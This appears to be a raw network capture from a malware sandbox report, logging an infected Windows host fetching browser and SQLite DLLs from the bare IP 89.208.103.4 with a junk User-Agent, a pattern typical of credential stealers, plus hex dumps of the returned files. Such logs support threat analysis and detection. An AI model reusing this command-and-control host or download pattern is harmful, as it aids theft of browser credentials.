Aug 11, 2022 06:57:07.238156080 CEST	862	IN	Data Raw: e8 70 f9 14 00 89 f0 89 fa 8d 65 f8 5e 5f 5d c3 ff 15 78 c6 1d 10 85 c0 74 c3 50 e8 35 fb ff ff 83 c4 04 31 c0 48 89 44 24 04 89 04 24 eb ae cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 0c 8b 5d 08 8b 43 18 89 45 f0 8b 43 1c 89 45 ec b9 20 00 00 00 Data Ascii: pe^_]xtP51HD$$USWV]CECE +K1M4uGt'EH0jVuM]t}O30VuVO0SV^_[]U}uu]Uu
Aug 11, 2022 06:57:07.238171101 CEST	863	IN	Data Raw: 00 00 00 c7 45 e0 00 00 00 00 31 c0 89 55 f0 89 45 d4 8b 7c 1e 08 85 ff 0f 84 aa 01 00 00 89 fa 6a 00 ff 75 08 e8 37 02 00 00 83 c4 08 8b 55 f0 89 44 1a 08 80 3f b1 75 08 85 c0 0f 85 97 01 00 00 8b 7c 1e 0c 31 c0 85 ff 75 5f 89 44 1a 0c 8a 44 1e Data Ascii: E1UE\|ju7UD?u\|1u_DDDDLLD LDLDDE@;Mj(W-BM}U2E9w"wpPt\P83
Aug 11, 2022 06:57:07.238187075 CEST	864	IN	Data Raw: 82 01 01 00 00 8b 45 e8 8b 50 14 89 f9 53 e8 9a f9 ff ff 8b 55 e8 83 c4 04 8b 4d e4 89 41 14 e9 8c fe ff ff 8b 52 0c 31 f6 b8 00 00 00 00 85 d2 8b 7d e0 74 13 8d 45 ec 89 f9 50 6a 01 e8 0b fd ff ff 8b 4d e4 83 c4 08 89 41 0c 8b 45 e8 8b 50 10 85 Data Ascii: EPSUMAR1}tEPjMAEPtEPjMqUz(SVT1U#LuGHu)DuS@VU1H1
Aug 11, 2022 06:57:07.238204002 CEST	866	IN	Data Raw: 75 f0 ff 75 14 ff d1 8b 55 08 83 c4 08 85 c0 74 d1 39 fe 74 bc 8b 03 89 06 8b 07 89 03 89 1f eb b0 8b 03 89 02 8b 01 89 03 89 19 e9 52 ff ff ff 8b 45 ec 89 03 31 c9 e9 6a fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 6a 10 ff 15 08 c5 Data Ascii: uuUt9tRE1jUj]USWV} t@XtpStvM9vh4Fu~t\|u}t0W(ySuA1u;G(yt
Aug 11, 2022 06:57:07.907234907 CEST	3187	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: qwrqrwrqwrqwr Host: 89.208.103.4 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:07.961110115 CEST	3188	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:07 GMT Content-Type: application/octet-stream Content-Length: 449280 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:42 GMT ETag: "62543dae-6db00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a2 00 10 a0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL(["!(`@@Agr?=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Aug 11, 2022 06:57:08.324521065 CEST	3660	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1 Content-Type: text/plain; User-Agent: qwrqrwrqwrqwr Host: 89.208.103.4 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:08.378088951 CEST	3661	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:08 GMT Content-Type: application/octet-stream Content-Length: 80128 Connection: keep-alive Last-Modified: Sat, 28 May 2022 16:52:46 GMT ETag: "6292535e-13900" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 27 00 00 02 e0 27 00 00 02 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL(["!0t(@A? 8 @.text `.data@.idata@@.rsrc@@.reloc @B0''
Aug 11, 2022 06:57:08.657495975 CEST	3746	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1 Content-Type: text/plain; User-Agent: qwrqrwrqwrqwr Host: 89.208.103.4 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:08.714457035 CEST	3747	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:08 GMT Content-Type: application/octet-stream Content-Length: 627128 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:36 GMT ETag: "62543da8-991b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 ec 08 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!V/@AcQ,pr4CWh0.text `.rdata0@@.data0@.00cfgP @@.tls`"@.rsrcp$@@.reloc4CD.@BUSWV
Aug 11, 2022 06:57:09.164251089 CEST	4412	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: qwrqrwrqwrqwr Host: 89.208.103.4 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:09.217720032 CEST	4414	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:09 GMT Content-Type: application/octet-stream Content-Length: 684984 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:40:08 GMT ETag: "62543dc8-a73b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL&9b"!6@A4,S,xT8$&0.D.text `.rdata0@@.data<F@&@.00cfg(@@.rsrcx*@@.reloc8$&.@BUhO
Aug 11, 2022 06:57:09.639240026 CEST	5132	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: qwrqrwrqwrqwr Host: 89.208.103.4 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:09.691471100 CEST	5133	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:09 GMT Content-Type: application/octet-stream Content-Length: 254392 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:58 GMT ETag: "62543dbe-3e1b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 a1 0c 9a 03 10 85 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL'9b"!@AtvSw5hqD{.textV `.rdata@@.data~@.00cfg@@.rsrc@@.reloc56@BU
Aug 11, 2022 06:57:09.968697071 CEST	5401	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: qwrqrwrqwrqwr Host: 89.208.103.4 Connection: Keep-Alive Cache-Control: no-cache
Aug 11, 2022 06:57:10.024406910 CEST	5402	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Aug 2022 04:57:10 GMT Content-Type: application/octet-stream Content-Length: 1099223 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT ETag: "62541f08-10c5d7" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 